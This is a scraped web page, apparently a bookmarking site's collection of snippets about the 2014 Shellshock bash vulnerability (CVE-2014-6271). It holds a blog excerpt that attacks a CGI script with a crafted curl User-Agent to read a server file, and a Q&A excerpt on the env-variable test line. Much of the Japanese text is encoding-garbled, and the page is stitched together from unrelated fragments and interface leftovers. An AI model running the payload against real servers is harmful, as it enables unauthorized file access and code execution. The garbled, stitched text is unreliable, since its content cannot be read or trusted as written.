Deleted articles cannot be recovered. Draft of this article would be also deleted. Are you sure you want to delete this article?
ã¿ã¤ãã«ã¯ãã¯ãª å è¨äº: BASHã®èå¼±æ§ã§CGIã¹ã¯ãªããã«ã¢ã¬ããã¦ã¿ã¾ãã â ããã° â ã¯ã«ããªãã¯ã¹æ ªå¼ä¼ç¤¾ sakura ã®ã¬ã³ã¿ã«ãµã¼ãã cgi ã¢ã¼ã㧠php åããã¦ãããªã¼ã¨æã£ã¦ãã¹ããã¦ã¿ããã§ãã¾ããã # ãã¹ãã¹ã¯ãªããã¯åé¤æ¸ã¿ã§ãã test.php test.sh #!/usr/local/bin/bash echo "Content-type: text/plain" echo echo "Hi! I'm an ordinary CGI script which is executed by /usr/local/bin/bash" çµæ : Apache CGIç PHP $ curl -A '() { :;}; echo Content-type:text/plain;echo;/bin/cat test.php' http://wokam
Browse by time: December 2018 (1) December 2016 (1) December 2015 (1) January 2015 (1) September 2014 (2) July 2014 (2) April 2014 (1) February 2014 (1) January 2014 (3) December 2013 (2) September 2013 (3) June 2013 (1) May 2013 (1) April 2013 (1) March 2013 (2) February 2013 (5) ãã£ã¨æ´æ°ããæ°ã«ãªã£ãã ããã 0. ç£æ¥ã§èª¬æ 1. çè«ç·¨ 2. æ»æç·¨ 3. ããã 4. çµè« 0. ç£æ¥ã§èª¬æ bashã ã¢ã㧠å°çãã¤ã㤠1. çè«ç·¨ bashã®é¢æ°æ©è½ã¯ãç°å¢å¤æ°ã®ä¸ã§ã使ããä»æ§ã«ãªã£ã¦ãã¾ã
There is apparently a vulnerability (CVE-2014-6271) in bash: Bash specially crafted environment variables code injection attack I am trying to figure out what is happening, but I'm not entirely sure I understand it. How can the echo be executed as it is in single quotes? $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test EDIT 1: A patched system looks like
ã©ã³ãã³ã°
ã©ã³ãã³ã°
ã©ã³ãã³ã°
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}